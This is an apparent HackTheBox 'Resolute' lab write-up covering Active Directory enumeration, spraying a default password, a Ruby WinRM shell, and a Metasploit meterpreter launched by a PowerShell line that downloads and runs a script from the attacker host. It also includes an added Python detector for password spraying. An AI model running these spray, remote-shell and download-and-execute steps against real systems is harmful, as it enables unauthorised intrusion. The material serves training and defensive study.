HTB - Windows Resolute
We started by finding a default password in the LDAP description field of one user and then sprayed it across the user list to get our initial foothold. The WinRM service gave us our first shell through a Ruby script. A PowerShell transcript file containing the second user's password could be found in a hidden directory under C:\. That account was a member of the DnsAdmins group, which allowed a privilege escalation through the DNS service.
nobody - user
Nmap, as usual:
$ nmap -sS -sV -sC -p- -T4 -vvv -oN nmap.txt 10.10.10.169
# Nmap 7.80 scan initiated Thu Jan 9 10:26:01 2020 as: nmap -sS -sV -sC -p- -T4 -vvv -oN nmap.txt 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up, received reset ttl 127 (0.018s latency).
Scanned at 2020-01-09 10:26:01 CET for 173s
Not shown: 65512 closed ports
Reason: 65512 resets
PORT STATE SERVICE REASON VERSION
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-09 09:35:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49912/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58466/tcp open unknown syn-ack ttl 127
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h48m47s, deviation: 4h37m10s, median: 8m45s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36199/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 13498/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-01-09T01:36:06-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-09T09:36:05
|_ start_date: 2020-01-09T00:05:31
So this machine belongs to an AD domain with some interesting services such as SMB (139/445) and AD LDAP (389). The machine name is RESOLUTE, its domain name is megabank.local and the workgroup is MEGABANK.
My first action is always SMB enumeration, in order to identify users or shares on the remote host, so let's fire up crackmapexec.
$ cme smb 10.10.10.169 --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating shares: SMB SessionError: 0x5b
$ cme smb 10.10.10.169 --users
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
It seems that we don't have the rights for it :( so let's look for information on the LDAP service. I have a personal tool to gather information from LDAP services, but tons of public tools exist on the web.
./slap --host 10.10.10.169 --exec users -b "DC=megabank,DC=local"
[~] Testing connexion to ldap://10.10.10.169:389
[+] Logged as anonymous
[~] Gathering all users
[+] Found 30 users
CN=Guest,CN=Users,DC=megabank,DC=local
CN=DefaultAccount,CN=Users,DC=megabank,DC=local
CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local
CN=MS02,CN=Computers,DC=megabank,DC=local
CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
CN=Sunita Rahman,CN=Users,DC=megabank,DC=local
CN=Abigail Jeffers,CN=Users,DC=megabank,DC=local
CN=Marcus Strong,CN=Users,DC=megabank,DC=local
CN=Sally May,CN=Users,DC=megabank,DC=local
CN=Fred Carr,CN=Users,DC=megabank,DC=local
CN=Angela Perkins,CN=Users,DC=megabank,DC=local
CN=Felicia Carter,CN=Users,DC=megabank,DC=local
CN=Gustavo Pallieros,CN=Users,DC=megabank,DC=local
CN=Ulf Berg,CN=Users,DC=megabank,DC=local
CN=Stevie Gerrard,CN=Users,DC=megabank,DC=local
CN=Claire Norman,CN=Users,DC=megabank,DC=local
CN=Paulo Alcobia,CN=Users,DC=megabank,DC=local
CN=Steve Rider,CN=Users,DC=megabank,DC=local
CN=Annette Nilsson,CN=Users,DC=megabank,DC=local
CN=Annika Larson,CN=Users,DC=megabank,DC=local
CN=Per Olsson,CN=Users,DC=megabank,DC=local
CN=Claude Segal,CN=Users,DC=megabank,DC=local
CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
CN=Zach Armstrong,CN=Users,DC=megabank,DC=local
CN=Simon Faraday,CN=Users,DC=megabank,DC=local
CN=Naoki Yamamoto,CN=Users,DC=megabank,DC=local
That is a lot of users; maybe we can get more information from their description attribute.
$ ./slap --host 10.10.10.169 --exec users -b "DC=megabank,DC=local" opt --full | grep description
description: Built-in account for guest access to the computer/domain
description: A user account managed by the system.
description: Account created. Password set to Welcome123!
It seems that the default password is set to Welcome123! when a user is created. It is a good idea to test this password on all users now: create a wordlist and use msf to try it against every account.
$ ./slap.py --host 10.10.10.169 --exec users -b "DC=megabank,DC=local" opt --full | egrep "sAMAccountName: (.*)" | cut -d " " -f 6 > users_only.txt
$ msf
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users_only.txt
USER_FILE => users_only.txt
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass Welcome123!
SMBPass => Welcome123!
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.169
RHOSTS => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Guest:Welcome123!',
[!] 10.10.10.169:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\DefaultAccount:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\RESOLUTE$:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\MS02$:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marko:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claude:Welcome123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: '.\melanie:Welcome123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\zach:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\naoki:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\Marko:Welcome123!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
Nice, we have a hit for melanie:Welcome123!. I used my personal tool, but we could also have used:
nullinux (Manjaro users must install manjaro-settings-samba)
enum4linux
GetADUsers.py
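The spray above produces a burst of failed logons for many different accounts from a single source within a few seconds, and that is exactly the signature a defender can alert on. The following detector is an added example, not part of the original write-up: it runs that logic over constructed sample events written in a flat "timestamp key=value" export format (4625 is the Windows logon-failure event, 4624 the success; the sample lines, the five-account threshold and the five-minute window are assumptions).

```python
"""Password-spray detection over Windows Security logon events (added example).

A spray like the one above shows up on the domain controller as a burst of
4625 (logon failure) events from one source address, each for a different
account, often followed by a single 4624 (success) for the account that still
has the default password. Sample lines below are constructed, not real
events from the box.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: seven single failures from the spraying host, one
# success (melanie), a straggler hours later, plus an unrelated user mistyping
# her own password twice at the console (same account, so not a spray).
SAMPLE_LOG = """\
2020-01-10T09:05:00 EventID=4625 TargetUserName=sally IpAddress=10.10.10.50 LogonType=2 Status=0xC000006D
2020-01-10T09:05:20 EventID=4625 TargetUserName=sally IpAddress=10.10.10.50 LogonType=2 Status=0xC000006D
2020-01-10T14:33:01 EventID=4625 TargetUserName=Guest IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T14:33:01 EventID=4625 TargetUserName=ryan IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T14:33:02 EventID=4625 TargetUserName=marko IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T14:33:02 EventID=4625 TargetUserName=sunita IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T14:33:03 EventID=4625 TargetUserName=abigail IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T14:33:03 EventID=4625 TargetUserName=marcus IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T14:33:04 EventID=4624 TargetUserName=melanie IpAddress=10.10.14.37 LogonType=3 Status=0x0
2020-01-10T14:33:04 EventID=4625 TargetUserName=zach IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
2020-01-10T16:00:00 EventID=4625 TargetUserName=steve IpAddress=10.10.14.37 LogonType=3 Status=0xC000006D
"""


def parse_event(line):
    """Parse one 'timestamp key=value ...' line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) < 2:
        return None
    try:
        ev = {"time": datetime.fromisoformat(parts[0])}
    except ValueError:
        return None
    for token in parts[1:]:
        key, sep, value = token.partition("=")
        if not sep:
            return None
        ev[key] = value
    if not all(k in ev for k in ("EventID", "TargetUserName", "IpAddress")):
        return None
    ev["EventID"] = int(ev["EventID"])
    return ev


def detect_spray(lines, window=timedelta(minutes=5), min_accounts=5):
    """Return one alert per source address that failed logons for at least
    `min_accounts` distinct accounts inside some `window`-long interval.
    Each alert also lists accounts that logged on successfully from the same
    source after the spray started (the foothold the spray was looking for)."""
    events = sorted((e for e in map(parse_event, lines) if e), key=lambda e: e["time"])
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["IpAddress"]].append(ev)

    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["EventID"] == 4625]
        # Sliding window over the time-ordered failures: keep the largest set
        # of distinct accounts that fell inside one `window`.
        best, start = set(), 0
        for end, fail in enumerate(failures):
            while fail["time"] - failures[start]["time"] > window:
                start += 1
            accounts = {f["TargetUserName"].lower() for f in failures[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) < min_accounts:
            continue
        per_account = Counter(f["TargetUserName"].lower() for f in failures)
        since = failures[0]["time"]
        successes = sorted({e["TargetUserName"].lower() for e in evs
                            if e["EventID"] == 4624 and e["time"] >= since})
        alerts.append({
            "source": src,
            "distinct_accounts": len(best),
            "max_failures_per_account": max(per_account.values()),  # ~1 for a spray
            "success_after_spray": successes,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG.splitlines()):
        print(alert)
```

A low max_failures_per_account together with a high distinct_accounts count separates a spray (one guess per account, as above) from a brute force against one account; the success_after_spray list is what makes the alert actionable.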
$ sudo ./nullinux.py 10.10.10.169
Starting nullinux v5.4.1 | 01-10-2020 14:33
[*] Enumerating Shares for: 10.10.10.169
Shares Comments
-------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: 10.10.10.169
[+] Domain Name: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436
[*] Enumerating querydispinfo for: 10.10.10.169
abigail
Administrator
angela
annette
annika
claire
claude
DefaultAccount
felicia
fred
Guest
gustavo
krbtgt
marcus
marko
melanie
naoki
paulo
per
ryan
sally
simon
steve
stevie
sunita
ulf
zach
[*] Enumerating enumdomusers for: 10.10.10.169
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[*] Enumerating LSA for: 10.10.10.169
[*] Performing RID Cycling for: 10.10.10.169
[*] Testing 10.10.10.169 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.169
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
Administrator
[+] Group: Domain Users
Administrator
DefaultAccount
krbtgt
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[+] Group: Domain Guests
Guest
[+] Group: Domain Computers
MS02$
[+] Group: Domain Controllers
RESOLUTE$
[+] Group: Schema Admins
Administrator
[+] Group: Enterprise Admins
Administrator
[+] Group: Group Policy Creator Owners
Administrator
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Contractors
ryan
[*] 29 unique user(s) identified
[+] Writing users to file: ./nullinux_users.txt
Now that we have a valid user we want a shell to go further. I am in the habit of looking for data in shares first.
$ cme smb 10.10.10.169 -u melanie -p "Welcome123\!" --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] MEGABANK\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares
SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark
SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------
SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.10.10.169 445 RESOLUTE C$ Default share
SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC
SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
We see two shares available to us (READ permission):
NETLOGON
SYSVOL
We can use smbmap.py to list those directories recursively.
smbmap uses impacket for network communication, and since Python 3.8 there is a bug with this library: if you try to use it, even with the right credentials, you will see [!] Authentication error on (https://github.com/ShawnDEvans/smbmap/issues/40). So use Python 3.6 instead, for example.
$ ./smbmap.py -u melanie -p "Welcome123\!" -d MEGABANK -H 10.10.10.169 -R SYSVOL
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.169...
[+] IP: 10.10.10.169:445 Name: 10.10.10.169
Disk Permissions Comment
---- ----------- -------
SYSVOL READ ONLY
.\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 megabank.local
.\megabank.local\
dr--r--r-- 0 Wed Sep 25 15:34:36 2019 .
dr--r--r-- 0 Wed Sep 25 15:34:36 2019 ..
dr--r--r-- 0 Fri Jan 10 01:23:59 2020 DfsrPrivate
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Policies
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 scripts
.\megabank.local\Policies\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
fr--r--r-- 22 Wed Nov 20 20:06:43 2019 GPT.INI
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 MACHINE
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 USER
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 .
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Microsoft
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 Scripts
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Windows NT
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Nov 20 20:06:43 2019 SecEdit
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\
dr--r--r-- 0 Wed Nov 20 20:06:43 2019 .
dr--r--r-- 0 Wed Nov 20 20:06:43 2019 ..
fr--r--r-- 1098 Wed Nov 20 20:06:43 2019 GptTmpl.inf
.\megabank.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 .
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 ..
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 Shutdown
dr--r--r-- 0 Fri Sep 27 13:02:33 2019 Startup
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
fr--r--r-- 22 Wed Sep 25 15:28:35 2019 GPT.INI
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 MACHINE
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 USER
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Microsoft
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 Windows NT
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 SecEdit
.\megabank.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 .
dr--r--r-- 0 Wed Sep 25 15:28:35 2019 ..
fr--r--r-- 3740 Wed Sep 25 15:28:35 2019 GptTmpl.inf
Nothing very interesting; let's see NETLOGON.
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.169...
[+] IP: 10.10.10.169:445 Name: 10.10.10.169
Disk Permissions Comment
---- ----------- -------
NETLOGON READ ONLY
.\
Uhm, nothing in there either.
To be sure, we can use the crackmapexec spider command to look for *.xml files such as Groups.xml, which can contain high-value information.
$ cme smb 10.10.10.169 -u melanie -p "Welcome123\!" --spider SYSVOL --pattern xml
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] MEGABANK\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [*] Started spidering
SMB 10.10.10.169 445 RESOLUTE [*] Spidering .
SMB 10.10.10.169 445 RESOLUTE [*] Done spidering (Completed in 1.54662799835)
Nothing more. Let's try something else: while googling some of the open ports I came across this one: 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP). This port is associated with WinRM (Windows Remote Management), a Microsoft service made to administer remote hosts; we could compare it as Shell - SSH on Linux to PowerShell - WinRM on Windows. It is based on HTTP and SOAP. There are two assigned ports: 5985 for HTTP and 5986 for HTTPS. Usually we would use PowerShell to talk to this service and execute commands, but as I am on Linux we have to find something else:
python: https://github.com/diyan/pywinrm (seems to have trouble with auth)
msf: auxiliary/scanner/winrm/winrm_login or auxiliary/scanner/winrm/winrm_cmd (and auxiliary/scanner/winrm/winrm_auth_methods to identify authentication methods)
As auxiliary/scanner/winrm/winrm_cmd was only getting me HTTP 500 errors, I used a nice script found on https://www.absolomb.com/2018-07-15-HackTheBox-Bart/
require 'winrm'

# Connection options for the WinRM endpoint on port 5985 (HTTP, Negotiate auth).
opts = {
  endpoint: 'http://10.10.10.169:5985/wsman',
  user: 'melanie',
  password: 'Welcome123!',
  transport: :negotiate
}
conn = WinRM::Connection.new(opts)

command = ""
output = nil
# Open a remote PowerShell shell and relay typed commands until "exit".
conn.shell(:powershell) do |shell|
  until command == "exit\n"
    print "PS > "
    command = gets || "exit\n"   # treat EOF (Ctrl-D) like "exit" instead of passing nil to run
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
$ rlwrap ruby winrm_shell.rb
PS > whoami
megabank\melanie
Now we have a tiny shell, but it would be nice to have a meterpreter one, so I'm going to use Invoke-MetasploitPayload (https://github.com/jaredhaight/Invoke-MetasploitPayload).
$ msf
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set SRVHOST 10.10.14.37
SRVHOST => 10.10.14.37
msf5 exploit(multi/script/web_delivery) > set SRVPORT 8443
SRVPORT => 8443
msf5 exploit(multi/script/web_delivery) > set SSL true
SSL => true
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set URIPATH p
URIPATH => p
msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/script/web_delivery) > set LHOST 10.10.14.37
LHOST => 10.10.14.37
msf5 exploit(multi/script/web_delivery) > set LPORT 443
LPORT => 443
msf5 exploit(multi/script/web_delivery) > run -j
[*] Started HTTPS reverse handler on https://10.10.14.37:443
[*] Using URL: https://10.10.14.37:8443/p
[*] Server started.
And in our tiny shell:
PS > Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.37/Invoke-MetasploitPayload.ps1')
PS > Invoke-MetasploitPayload 'https://10.10.14.37:8443/p'
Don't forget to serve Invoke-MetasploitPayload.ps1 from your local machine, as HTB boxes can't reach the internet.
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > sessions -L
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows MEGABANK\melanie @ RESOLUTE 10.10.14.37:443 -> 10.10.10.169:51140 (10.10.10.169)
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > sessions -i 1
meterpreter > shell
Process 2972 created.
Channel 2 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\melanie\Documents>type ..\Desktop\user.txt
type ..\Desktop\user.txt
0c3be45fcfe249796ccbee8d3a97854
We now have a meterpreter shell as the user melanie.
whoami /all
USER INFORMATION
----------------
User Name SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
user - admin
Looking at C:\Users shows that there is another interesting user: ryan.
PS > dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM rya
What information do we have about him from the previous enumeration with my tool?
$ cat users.txt | grep -i "CN=ryan" -A 40
CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Bertrand
sn: Bertrand
givenName: Ryan
distinguishedName: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
instanceType: 4
whenCreated: 20190927105650.0Z
whenChanged: 20200109105102.0Z
displayName: Ryan Bertrand
uSNCreated: 13048
memberOf: CN=Contractors,OU=Groups,DC=megabank,DC=local
uSNChanged: 151424
name: Ryan Bertrand
objectGUID: [b'\xe3\x83\x8c\x84\xbel>M\xba\xcf\xaa{\xd3}\xa6\x91']
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
logonHours: [b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff']
pwdLastSet: 132230406621719534
primaryGroupID: 513
objectSid: [b'\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00i\xe0\x06SN\x15\x9a\xb3\xac\x08a\xd6Q\x04\x00\x00']
accountExpires: 0
logonCount: 0
sAMAccountName: ryan
sAMAccountType: 805306368
userPrincipalName: ryan@megabank.local
